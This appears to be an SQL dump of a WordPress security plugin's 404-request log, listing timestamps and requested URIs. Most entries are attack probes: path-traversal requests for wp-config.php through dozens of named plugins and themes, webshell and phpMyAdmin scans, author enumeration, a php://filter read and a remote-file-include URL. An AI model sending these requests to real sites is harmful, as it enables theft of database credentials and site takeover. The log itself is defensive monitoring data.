(0x98cbf373ad44e75c2184198f44a4f036, 1471816204, '/wp-content/uploads/nb6pb4bf.php'),
(0x3d21cad1738daf5e4787e73983f3a858, 1471816205, '/wp-content/plugins/revslider/temp/update_extract/68brxnv8.php'),
(0x3ec6fba921e2d3ab7b392cf75fd5cbde, 1471890006, '/wp-content/plugins/wp-symposium/readme.txt'),
(0xf36ab38f94e93474ec07ce65d0c02312, 1471901179, '/modules/columnadverts/uploadimage.php'),
(0x69d4e8d9b71f1069cae5d7ba3565c379, 1471936420, '/?gf_page=upload'),
(0xfa9a5fc4342fb61fddd4d74de8359c41, 1471961982, '/modules/homepageadvertise/uploadimage.php'),
(0xac70dcde7fffc0fe21de8910e4c18a0d, 1471970596, '/wp-content/themes/clockstone/style.css'),
(0xcacf9ab6f5875983196e851125c09cf0, 1471981619, '/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php'),
(0x23c53773c34f8f78b9ca6fc985db6b4e, 1472011337, '/404.php'),
(0x273c0e49a7071901225f6545bcb820c1, 1472032628, '/modules/simpleslideshow/uploadimage.php'),
(0xbbe295a35d2826b19ae4420e7ad19772, 1472060400, '/wp-content/themes/Clockstone/style.css'),
(0x871e6d05ea69c825ed0a88bba07aa560, 1472063406, '/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php'),
(0x297db4d1c6e41c130a3c3bff1313dbf2, 1472066977, '/wp-content/themes/headway-163/style.css'),
(0x9a16ffd4aa677fae1d6b6ceae890784f, 1472076336, '/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php'),
(0x59c9ef9cf0a5b3d43dbdf2129231a23f, 1472122277, '/wp-content/themes/headway-166/style.css'),
(0x5f9dfb9d8e8ffd7bb7f407a60f1b32cf, 1472147543, '/wp-content/plugins/wp-checkout/vendors/timthumb.php'),
(0xcd2d665e4543ac89fadad1fcf7423a10, 1472174876, '/wp-options.php'),
(0xe6690f0e65df6198b4e6436776aa5584, 1472181239, '/wp-content/plugins/estatik/front_templates/css/es_front_style.css'),
(0x90d1396d31e80fd6f799d93375f1ab63, 1472185105, '/modules/productpageadverts/uploadimage.php'),
(0x0504e9b8c7e9acc655e3f413f9adf3e9, 1472192555, '/404_error.php'),
(0xe576072c6a6389e397dc03a8d872e34e, 1472210978, '/wp-content/themes/brainstorm/style.css'),
(0x5352bd93fb5e5a217b4d5ca8cbe5ba00, 1472245074, '/wp-content/plugins/wp-checkout/css/colorbox.css'),
(0x4982c4a139dc125c199dca26a5d7a869, 1472265979, '/wp-content/plugins/boxit/upload.php'),
(0xec9ce52a3ca985dc603ce7ddcc73af51, 1472284627, '/wp-content/plugins/1-flash-gallery/readme.txt'),
(0xc2cabd24084b15e984984229956ad81f, 1472322985, '/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css'),
(0x28fb22742ce2dc5982b5d80b2ce6a50d, 1472323561, '/wp-includes/routing.php'),
(0xcfe9e250b0dabebbfd1a7977fb63cdfc, 1472323561, '/wp-indeks.php'),
(0x6a85f358e908b7d0e7b5996c06ee623f, 1472343903, '/wp-content/plugins/php-event-calendar/server/classes/uploadify.php'),
(0x0fbc8edaa07118622ca1053797efd554, 1472363210, '/wp-admin/includes/images.php'),
(0x02c9377af4174634e7a0884a3d29f5ee, 1472363216, '/wp-admin/includes/index.php'),
(0x8b76173a68685227ee21db7779446899, 1472363217, '/wp-admin/includes/newfile.php'),
(0x1df11162da5daa87b88523c5957092f9, 1472363219, '/wp-admin/includes/sos.php'),
(0x30ccd0772b5f19b506d021e0a1511d31, 1472363220, '/wp-admin/includes/w2.php'),
(0xe6cfcc0c91d7f5ee5945f055ec5aeb9a, 1472363222, '/wp-admin/includes/wp-object-cache.php'),
(0x32e2f7b061dc0786051e0d3540f6d22b, 1472363224, '/wp-admin/js/.api.php'),
(0x0c91ec94eef0ba13641a2bd0861d3f24, 1472363225, '/wp-admin/js/bin.php'),
(0x26f9e7e8cc8e4707ab3137d36bf5259f, 1472393178, '/js/webforms/upload/'),
(0x4298c8f8da178b04c169c5e7772a6b7a, 1472473489, '/wp-content/plugins/wp-dreamworkgallery/css/admin.css'),
(0xf7e728a08aa2cdd06e627791c762caf3, 1472489333, '/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php'),
(0x93d64a8865167a47116874eeb513908e, 1472522602, '/configbak.php'),
(0x23229a0e384008921c228badab7a4413, 1472547414, '/admin.php'),
(0x64622368777435c91b2ddf48e8e43510, 1472553905, '/wp-content/plugins/wp-homepage-slideshow/readme.txt'),
(0x0c1b1c41bc1564fe146d1b4bdeb1930b, 1472554218, '/zxr.html'),
(0xe4d635b6081cbea5bfb59e7121434599, 1472568458, '/wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/upload.php'),
(0xa3c2bf2ee57f78762d5446c0388b2eaf, 1472640224, '/wp-content/plugins/wp-formgenerator/uploads/php'),
(0xc8fb83bd9d91ce2ccddb163d8527d2f3, 1472705970, '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'),
(0x156936c523b2d9b01618f44a32e59415, 1473075992, '/wp-content/plugins/wp-bliss-gallery/readme.txt'),
(0xf2c5b5da3ac1f1694311b56683c4e5c5, 1473103869, '/wp-content/plugins/wp-catprogallery/readme.txt'),
(0xcaba251d195e6ba820c38ff9f65367ed, 1473150074, '/phpmyadmin/scripts/setup.php'),
(0x9b8f2b2341392b80e95f221f10806954, 1473150075, '/phpMyAdmin/scripts/setup.php'),
(0x5de26861f90848af365283259a3c8424, 1473150075, '/PMA/scripts/setup.php'),
(0xbd0834c66d75f6ec032aece685499ccf, 1473150075, '/pma/scripts/setup.php'),
(0x06cef0d4da771fac08a6d534a22f5714, 1473150076, '/sql/scripts/setup.php'),
(0x5d94e1a809b1d0c421475ec51b6462cd, 1473150077, '/admin/scripts/setup.php'),
(0x2e02fcc02ff2a35563468fda0b289b7a, 1473150077, '/dbadmin/scripts/setup.php'),
(0xa057d3f2212bb0df484e6ccea39f18af, 1473150078, '/mysql/scripts/setup.php'),
(0xd8c1b1d9b683d148b005904d3ab52bde, 1473150079, '/myadmin/scripts/setup.php'),
(0xf2cecba6fbd55f334fc56527dc03bdca, 1473150079, '/mysqladmin/scripts/setup.php'),
(0x83974fcdb0f01748ff688514ce1e3f9c, 1473281651, '/wp-content/uploads/wpcf7_captcha/107101539.png'),
(0x91abbae9b1437c58bff7e7150fdd28e9, 1473301389, '/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'),
(0xf77ae27dc6ae18347ca4610e87c366b7, 1473459419, '/wp-content/plugins/cysteme-finder/css/theme.css'),
(0x424f7fec95d2608eaf74afd08a062113, 1473464790, '/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\''),
(0xfd22ccf97697606953f165756b840aa6, 1473564182, '/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css'),
(0x13175a9e310525157bf880988d0fa8a2, 1473607774, '/wp-content/plugins/add-from-server/screenshot-1.png'),
(0x73fd51f7fba8eeb224691c41b63cf090, 1473634899, '/wp-content/plugins/iwp-client/readme.txt'),
(0x588818c5d9f51740eff663c09584824f, 1473731058, '/cache.php'),
(0x8c024e23a65d0a86c4eccc932d15064d, 1473877927, '/wp-includes/insmod.php'),
(0x94a0fbaebfc76a1c2a27df775dda3510, 1473903057, '/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php'),
(0x5473a30915eae54c3866b6bb2989defa, 1473980776, '/wp-content/plugins/cysteme-finder/php/connector.php'),
(0xf9b2b4ef6dcfd8e0aae37e43a48419d0, 1474130653, '/wp-content/themes/bordeaux-theme/functions/upload-handler.php'),
(0xa71fc90c564a93fe66be59a0ec39ffef, 1474133839, '/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php'),
(0x29cb2c73cd8a30d8d0c166e2db1cef6a, 1474168119, '/zabbix/'),
(0xb8bf8ae7013e1eb6d5f3f60d35ad7dbc, 1474243934, '/wp-content/plugins/attachment-manager/xavisys-plugin-framework.css'),
(0xb6f25b4c3be1c95ba56d07b09c4f0b2c, 1474325628, '/wp-content/plugins/cherry-plugin/admin/import-export/import.php'),
(0x1de145482a09221530ee7d1bb738c5c8, 1474330125, '/wp-content/uploads/hrv68rd2.php'),
(0xe9e1ef9665e46d3f1503dab80feb881b, 1474330126, '/wp-content/uploads/4xrtz64t.php'),
(0x2ac6c60d8102edb2db1602a10d4f74e8, 1474330127, '/wp-content/plugins/revslider/temp/update_extract/86r6v220.php'),
(0x1b1ecdb5b584c333b6c9a1f89c8258f8, 1474339208, '/wp-content/plugins/front-end-upload/readme.txt'),
(0xdc2f6f985e966615dd7e71f061dccd87, 1474344730, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.ghanachambertakoradi.org/tmp/db.php'),
(0x5569ce7e0239501ae7d2cb192783984a, 1474344746, '/wp-content/plugins/wp-symposium/server/php/EMmGPhOnlpXMsV.php'),
(0xe901fda38becab8dc50d1fd4fc499749, 1474362140, '/wp-content/plugins/woocommerce-product-addon/readme.txt'),
(0xacf565dec17c6bc38acd136c98b3a184, 1474393935, '/wp-content/plugins/addblockblocker/style.css'),
(0xe4be77bcbb9fb276923864fe289a244f, 1474420638, '/wp-content/plugins/piecemaker/php.php'),
(0x82e82e1e59ee775cd384994ae26015e1, 1474510454, '/wp-content/plugins/genesis-simple-defaults/readme.txt'),
(0x0de91bd58d7737ff93ab3a510e56edf2, 1474618270, '/wp-content/plugins/downloads-manager/single-download-template.tpl'),
(0x0ac6c3991f15aa31c96795a895faf075, 1474755348, '/wp-content/themes/eptonic-v1.4.3/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x30a2faa18f0dd338a8136ef52d583135, 1474763573, '/wp-content/plugins/jssor-slider/assets/css/jssor-slider.css'),
(0x36d3d365e259e18ddf3c9f8e7c7ab0bc, 1474833316, '/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php'),
(0x7d85c3ee95fb4adbc438520a15049949, 1474863287, '/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php'),
(0x132b9a602beb5b7643574cd830854b4a, 1474911750, '/wp-content/plugins/liveforms/views/css/front.css'),
(0x99f93214bd0c05ea636e63ea132fe1b5, 1475039098, '/wp-content/plugins/wpstorecart/css/wpsc-checkout.css'),
(0x8c9741130cad624a5f414bb33a0c1bf8, 1475063888, '/wp-imporst.php'),
(0x3793665eed1a3f7d0704d55e1e4532ca, 1475102283, '/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x7991e7d68aa09855fa6ce5e13bd8b217, 1475110702, '/wp-admin/js/mssqli.php'),
(0x47392ea35b12ad5a98184406b1eeb6fe, 1475110726, '/wp-admin/js/mysqld.php?9c25c3f2=1'),
(0xd53de1804ca9b136cbbfcb60dbea50b8, 1475110799, '/wp-admin/media-parse-new.php'),
(0xf1432b688b1a6790668605435770161c, 1475110827, '/wp-admin/network/404.php'),
(0xc311b5d658a269ab264d36459fd20ceb, 1475110856, '/wp-admin/support.php'),
(0xb6cc180d3bc649930cd8bd46b46531f3, 1475117732, '/feed2js/magpie_debug.php'),
(0x4382e80c5f9375a0a222d79e3d20280c, 1475173737, '/wp-content/themes/nuance-v1.2.3/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x6c22cecb3f8ac1e7d1f7149d0a4dfcc7, 1475205575, '/wp-content/themes/awake/lib/scripts/dl-skin.php'),
(0x573e6264e401a6652a6064aa63bf372a, 1475223343, '/wp-admin/js/system.php'),
(0x520bb982ef2872d8669a11e1adcc6701, 1475223343, '/wp-admin/css/system.php'),
(0x41043aa68081e497f1f2dde5254fcdb3, 1475223343, '/wp-admin/maint/system.php'),
(0xff2c631e2ed095584d2238122321cc73, 1475223344, '/wp-admin/network/system.php'),
(0x48a32daf550a70061789025948796df7, 1475223377, '/wp-content/uploads/2014/ini.php'),
(0xa5e2a4c66b68ca9c891bcdef5fecbdb0, 1475223377, '/wp-includes/certificates/system.php'),
(0xe9d18d722de30abbbc679b48cf39e974, 1475223377, '/wp-includes/core.php'),
(0x9af3739847d45b97d872953de4de3b43, 1475223378, '/wp-content/themes/twentytwelve/inc/main.php'),
(0x985a3240f75d8e998c461ba7c7fe2a2c, 1475223378, '/wp-includes/fonts/system.php'),
(0x6a5a3eac6df0e50fcacd732bdf24920a, 1475223378, '/wp-includes/id3/system.php'),
(0x85be3e8bee6ebc9d11de7aee6e066fbc, 1475223378, '/wp-includes/css/maink.php'),
(0xa7a2a8689138c43899800a6c813d37ca, 1475223378, '/wp-includes/css/system.php'),
(0xa4e9c81112e7335eaef06e2978e50103, 1475223409, '/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php'),
(0xf5cc02b5c24b098c52bf76e4ddd595fe, 1475223409, '/wp-includes/js/jquery/ui/main.php'),
(0x0d0dfe552470b063250afc528bed4f03, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php'),
(0x29a8249914ca819480599c30f420a27f, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/class.php'),
(0xcab5239178020d6598fd41862b8c433a, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/default/class.php'),
(0x9bb7365b0331ac918c8e6092611cf0fb, 1475223410, '/wp-includes/js/tinymce/langs/main.php'),
(0x39c5a6a534617b2d9ce7de65ab789218, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/default/img/class.php'),
(0x3de860b25883285debab858062a069fa, 1475223443, '/wp-includes/js/tinymce/themes/main.php'),
(0xb9d6d3187c804510922da0ee3ecd0e26, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/main.php'),
(0x4dde565ab20721f883db185baa966f11, 1475223443, '/wp-includes/theme-compat/maink.php'),
(0x6a3314f9bb5059e1c58ff18d97d8fb1a, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/class.php'),
(0x10251462099f1df85795d0f8dd76b695, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php'),
(0x6d666f6a3ff07d589efe0be28178f3bb, 1475223443, '/wp-includes/theme-compat/system.php'),
(0x462651ae1ea148b4df86b4ca01d6d4b1, 1475223443, '/wp-includes/simplepie/system.php'),
(0x3712d47bc96b3c5f742829dbdc10d4fa, 1475223443, '/wp-includes/js/tinymce/utils/main.php'),
(0xf60ce7565ca4dc8826457e1f9b1c21df, 1475223443, '/wp-includes/text/system.php'),
(0xb81b473420adbda2e0168f6fb5b92b6c, 1475338899, '/page/2/'),
(0x0fbab7edd0d4dab4bf31d3d31408c245, 1475338902, '/page/3/'),
(0x9e114c435bb4b681f9619ff3e7b3bbf6, 1475338904, '/page/4/'),
(0x5691cbcd1f6129dc3262ebee63fa0cff, 1475338907, '/page/5/'),
(0xf09ad30d8abdcb5a89371a979a96caa6, 1475338910, '/page/6/'),
(0x5f4a74c197137c3f9a65dfa4165022cc, 1475493889, '/comments/feed'),
(0x90b7d0be72eba3d2914291874151e590, 1475493898, '/wp-includes/js/jquery/).enctype,t.html5Clone='),
(0x04c4380bd6024a018c4847ea2754be4a, 1475493898, '/wp-includes/js/jquery/).length,t.htmlSerialize=!!d.getElementsByTagName('),
(0xc9c9bf390142cf20f83bc84ceff1ae63, 1475493899, '/wp-includes/js/jquery/,data:n}).done(function(e){o=arguments,s.html(i?x('),
(0x367aecd1c781257b5343e136d699f063, 1475493899, '/wp-includes/js/jquery/],_default:x.support.htmlSerialize?[0,'),
(0x5dec4d92b264e558e345638343b83b5c, 1475493900, '/https:/www.facebook.com/CrossTrainingNamur'),
(0xe31d9c0746221eecced9eee143e426f5, 1475493907, '/www.youtube.com/embed/_os-BkWwGKU'),
(0xfbebc64d8efe5514d23ac61c114b89e6, 1475493907, '/www.youtube.com/embed/dgKynOMF_HI'),
(0x4d86166b836cb24b696d829c5533bf9d, 1475493909, '/wp-includes/js/jquery/===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):'),
(0x950e94f0631d4ca99e71decdf6bc37d0, 1475493910, '/wp-content/plugins/slideshow-manager/coin-slider/+el.id).html(titles[el.id][imagePos[el.id]])}else{$('),
(0xe12b724313ab10a683c49f173cce326b, 1475493911, '/wp-includes/js/jquery/ui/).addClass(this._triggerClass).html(a?t('),
(0x76aba1067d8d200dbf300a0c0167b57e, 1475681218, '/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php'),
(0x2f403a8af0b35d944f8be8b1b38480b3, 1475737139, '/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php'),
(0x527605ab36acff0ace18ec54ac204d6e, 1475877210, '/?author=5'),
(0xe789486a9d13e576b54c095abbc104ba, 1475898585, '/m/'),
(0xdec05a813e04a70c40d2c027fb4b325b, 1475961962, '/wp-content/themes/area53-v1.0.1/framework/_scripts/valums_uploader/php.php'),
(0x74ede1af5803fe3bb89811d32811ef72, 1475963379, '/wp-temp-x43.php'),
(0x37181c1eba702e54a4b5df10a6eb7805, 1476199036, '/wp-content/themes/area53-v1.0.3/framework/_scripts/valums_uploader/php.php'),
(0xfae2f2a2cc1e56e632abe1b99534904c, 1476292383, '/wp-content/plugins/wp-mobile-detector/readme.txt'),
(0xfcb0b85b71e6b14d8d3f48d28330490a, 1476296147, '/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x1b94118dd465193e1231fb7d50961d12, 1476296147, '/wp-content/plugins/contact-form-7/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x89ec0ea9e628ff7a1e9cba4d43fe6262, 1476296147, '/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x1afacc0223d5360eda8b62866b114478, 1476296150, '/wp-content/restarts/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x362cf801e5d3bb289f9aaccc19e8e6b1, 1476296158, '/wp-content/restarts/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x6ea96fc2b697bea25af8a7377e853f0e, 1476296166, '/wp-content/plugins/revslider/temp/inbox/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0xec9b084c3bc7ad3dc0eeb8946fd53d35, 1476296190, '/wp-content/plugins/revslider/temp/inbox/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x91bc8fb0439c22353994765639d4c75a, 1476382732, '/wp-content/plugins/wpmarketplace/css/extends_page.css');
INSERT INTO `www2_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0xfd5940ead01fcf33980dfbd38864c872, 1476447247, '/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php'),
(0x098700fe4192b975a9c16ace2ffa882b, 1476464615, '/wp-content/themes/cubed_v1.2/style.css'),
(0x5b1d03ee152966a85ee86ba4433d9de8, 1476541049, '/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php'),
(0x7e1f072210c37857669590d9040cbdc8, 1476549119, '/wp-content/themes/area53-v1.0.4/framework/_scripts/valums_uploader/php.php'),
(0xb79bde9c0311410cd3632b209ff63bbf, 1476596654, '/include/fckeditor/editor/'),
(0xf72c01d3481f535503a5f6d5c692c86d, 1476596654, '/common/fckeditor/editor/'),
(0xd6b526c60495173df48ecbd35e87fdbc, 1476596654, '/manage/fckeditor/editor/'),
(0xb29a60c725cb00519284470bd4f3983a, 1476596654, '/editor/editor/'),
(0xc4165ebde6c98d64b6cbea66331b832a, 1476684326, '/wp-content/plugins/the-viddler-wordpress-plugin/css/viddler-wordpress.css'),
(0x242bb80f982712df4d46005a003082fc, 1476692897, '/language/en-GB/en-GB.xml'),
(0x6d7a3181a9e138477be81922747f729b, 1476762580, '/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'),
(0x9805f24a041d7fec6d4f5f1d082272b6, 1476896331, '/wp-content/themes/area53-v1.0.5/framework/_scripts/valums_uploader/php.php'),
(0x2cfc34fc4b13ba6dada99ec040eed7ad, 1476923484, '/blog/wp-admin/setup-config.php'),
(0x18df2f7a65d6a9e4c4a0199ec6624b13, 1476923484, '/wordpress/wp-admin/setup-config.php'),
(0x3911ab8f0e3ed3ab23b4fdd8d8e4b593, 1476923484, '/wp/wp-admin/setup-config.php'),
(0x995105a5232d034c1e21d5536227595b, 1476923485, '/backup/wp-admin/setup-config.php'),
(0xf271b17bcf158462260c4dc903aec774, 1476923485, '/blog/wordpress/wp-admin/setup-config.php'),
(0xdfb20530d30351af82622312f834c025, 1476923485, '/news/wp-admin/setup-config.php'),
(0x108010c233bc4f41d5e2a76d41180342, 1476923485, '/wordpress/wordpress/wp-admin/setup-config.php'),
(0xca948ecaad4eace7d42a83e5ff3c610b, 1476987561, '/wp-content/themes/graphene/style.css'),
(0xb04f961e018eb25de3d042f8dafbd467, 1476997238, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=ZnVuYy5waHA%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xadfcaf39cc7eabd00225b51c6ed43294, 1476997248, '/wp-content/plugins/func.php'),
(0xc0ced43b37e6e92774f02273ac609b79, 1477036566, '/wp-content/themes/twentyfifteen/wp-installation.php'),
(0x023027a68d940136806779710e9b0012, 1477071727, '/wp-content/themes/graphene-child/style.css'),
(0xd8f88deb95902a021c20541627baea74, 1477314547, '/?author=6'),
(0xcebcff07597c6477b4864641377ba6f5, 1477315874, '/?author=7'),
(0xe7e714edc7f4ccd0ff9693c1c45385a1, 1477317218, '/?author=8'),
(0x2193cd55edcdc1bce0b42296812bb64e, 1477318582, '/?author=9'),
(0x77f0593e9410c4a8db4a728e77dc11df, 1477319940, '/?author=10'),
(0x22800a0e700ee3661b9d5e7ade3ebd12, 1477397007, '/mobile/'),
(0x53967870e59ae54049ba292a32b07d4c, 1477410587, '/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php'),
(0x681043755738d33224671129f5930153, 1477470668, '/wp-content/uploads/user_uploads/db.php'),
(0x69cefcd6578710a8a6989d9ae1c2f81d, 1477470671, '/wp-content/uploads/wpmp-previews/db.php'),
(0xe70f206690d138cce2c5f4ff5287dacc, 1477484352, '/wp-readme.php'),
(0xf808f7268b59457e2084fa7fa9448aae, 1477582685, '/wp-content/themes/infocus2/lib/scripts/dl-skin.php'),
(0xd93e9cc446d856b22ed8c6f55f807c9f, 1477605380, '/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php'),
(0x841c3ed422bc02478fdf37e5ddd7c4e3, 1477621020, '/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php'),
(0x35ad88921940c908010e3d4f417f863f, 1477640556, '/wp-content/themes/echelon/lib/scripts/dl-skin.php'),
(0x242d14e47d7d99e278a77f3ef188b2fa, 1477720699, '/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA=='),
(0x8b2762a059c276c01b5dd352a899aae2, 1477740109, '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php'),
(0xeafbc91c61c94ab52be121748a556d86, 1477747460, '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php'),
(0x83295ae33a22cec3e5a135dd360ca53d, 1477757994, '/wp-content/themes/myriad/lib/scripts/dl-skin.php'),
(0x1c5d31ceab1ef2ad2cf6ceebaf16a1d9, 1477768824, '/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download'),
(0x53b4d1db75c3427f46e038cca61aacce, 1477776185, '/wp-content/plugins/custom-contact-forms/css/custom-contact-forms.css'),
(0xf84d8583577e40ac5c62aef80b14fcea, 1477796652, '/wp-content/themes/construct/lib/scripts/dl-skin.php'),
(0x06ef1d019254c95d4e6572e085a2b901, 1477811816, '/wp-content/themes/fusion/lib/scripts/dl-skin.php'),
(0xa4d40518ad62ca353ad559cfe288b3ad, 1477832889, '/wp-content/uploads/shell.php'),
(0x81124fdabeba4145328e48c0fc2c968d, 1477835848, '/wp-content/themes/infocus/lib/scripts/dl-skin.php'),
(0x1153b827ff3dfad3d7e7bc1f1c5f91da, 1477841866, '/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'),
(0x79351b7a2025816272a4ae59cbe9c402, 1477845664, '/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=../../../../wp-config.php'),
(0x148689635857ecf84122d186ce97fed9, 1477856392, '/wsososo.php'),
(0x295739767a668f2bdbaca3b404bed174, 1477870281, '/wp-content/plugins/image-export/download.php?file=../../../wp-config.php'),
(0x6c0c7319930b0b4ad61e4aa150bf48d3, 1477878945, '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php'),
(0x04118ad3af3a01a0bf6248e89574f909, 1477904544, '/wp-content/themes/lote27/download.php?download=../../../wp-config.php'),
(0x566a7d6be079e97094f6d9a68ae7c65d, 1477916294, '/wp-content/themes/dejavu/lib/scripts/dl-skin.php'),
(0x2e3b9561b25b3869ca9a5e0383e2136a, 1477952210, '/wp-content/themes/elegance/lib/scripts/dl-skin.php'),
(0x6fcefafc0478321d87652586b024a70b, 1477980102, '/wp-content/plugins/revslider/release_log.txt'),
(0xf6592da91949ab828ecb4712d27e31e6, 1477982831, '/wp-content/themes/method/lib/scripts/dl-skin.php'),
(0x7e2e6211b07cfc88900b5d826be4658b, 1478001482, '/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php'),
(0x5e66ebf05c90269708ae069a1b8192e2, 1478028585, '/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php'),
(0x6050e80675cc3b50e0a314dbb81ef810, 1478048977, '/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php'),
(0xf6d2bb5f4f6fb9c9c0b74fb4f6f119b9, 1478055125, '/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=../../../wp-config.php'),
(0xa3e7ce0228f318d7947b0b30240327c3, 1478091583, '/wp-content/themes/persuasion/lib/scripts/dl-skin.php'),
(0x185010fe1d39a140e5f767dacd8006c7, 1478155392, '/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php'),
(0x47f8434011968e6926044f30dab94d40, 1478175023, '/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php'),
(0x9bcc69f142b9e3cd19a07f62a62d72fd, 1478191652, '/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php'),
(0x7d5f8e71e16d5feea91a89cb2178ca52, 1478210360, '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'),
(0xa37d9fc54afaf88467e3dc2366dad531, 1478226864, '/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php'),
(0x8df495fad7e36389703ca68d1fbe4e78, 1478249139, '/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'),
(0x33bd8f20c8ec1bfcfabb2184a9ce15f9, 1478275206, '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'),
(0xdd986d09f9bd646379cc24b5ef72d53e, 1478309726, '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php'),
(0x86c0d7ad6de69d87aaffe34cc4da3e79, 1478327072, '/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php'),
(0x65d12c078a96208ef8b27e60e7735bb5, 1478335294, '/wp-content/force-download.php?file=../wp-config.php'),
(0xcb32c806f062b12c644f1e4748b8aaf5, 1478355201, '/wp-content/themes/modular/lib/scripts/dl-skin.php'),
(0xa5561265af7a0a20f406acce90ebf05d, 1478372712, '/wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php'),
(0xcaad691db2a6c1a99ede821a0ba684fc, 1478401975, '/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'),
(0xd0cd8cee8896b042f84a03f163ee27bc, 1478433728, '/wp-content/plugins/mainwp-child/readme.txt'),
(0xa12b86aa663d5e1116567443cf64336d, 1478704038, '/wp-content/uploads/68928575.php'),
(0x60990e69728614cd2e8d340137abaedf, 1478704040, '/72545552.php'),
(0x785eb0878a10bf664354f3a221cf295c, 1478704042, '/wp-content/plugins/revslider/temp/update_extract/89973456.php'),
(0xd9cfeeba1966493586642b5ec1ff5493, 1478704043, '/03338556.php'),
(0xf66124e21958cbcd66904e70a4d2294d, 1478704044, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=NDYzNDYxNTYucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xe37a52f8166a0e944b5d4d9a4460782b, 1478704045, '/wp-content/plugins/46346156.php'),
(0xa8ee1fccdf7d78c0bc23da0594c3c6c5, 1478751019, '/images/xxx.php'),
(0x549f29c16d6551116de3d61cd5ad1036, 1478751019, '/wp-main.php'),
(0x072d8a19475791a211ebac0834190da8, 1478751025, '/wp-content/plugins/myshe.php'),
(0xf268a08d2f67258f67d755aaa4b5eda9, 1478751186, '/tmp.php'),
(0x9a247f269610586f560fbec85c1bb103, 1478751212, '/wp-admin/ajax-module.php'),
